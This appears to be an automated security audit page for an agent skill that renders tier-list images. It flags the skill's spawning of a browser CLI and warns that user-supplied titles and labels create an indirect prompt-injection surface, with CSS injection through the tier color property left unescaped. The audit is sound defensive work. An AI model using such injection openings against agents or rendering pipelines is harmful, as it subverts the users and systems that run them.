tier-list-image
Pass
Audited by Gen Agent Trust Hub on Mar 12, 2026
Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The script
scripts/render-tier-list.mjsexecutes theagent-browsercommand-line tool using the Node.jsspawnmethod. This utility is used to render the generated HTML and capture the final screenshot. This is a core part of the skill's functionality. - [PROMPT_INJECTION]: The skill processes user-controlled data such as titles, item descriptions, and tier labels, and embeds them into an HTML template for rendering. This creates a surface for indirect prompt injection.
- Ingestion points: User-provided tier list specification JSON processed in
scripts/generate-html.mjs. - Boundary markers: Data is structured within a JSON schema, though no specific delimiters or 'ignore' instructions are added to the rendered HTML to signal non-executable content to the browser rendering engine.
- Capability inventory: The skill has local file system write access and can execute the
agent-browserCLI. - Sanitization: Content is passed through an
escapeHtmlfunction, which mitigates common HTML injection by escaping characters like < and >, but does not cover CSS injection in the tier color property or other sophisticated injection vectors.
Audit Metadata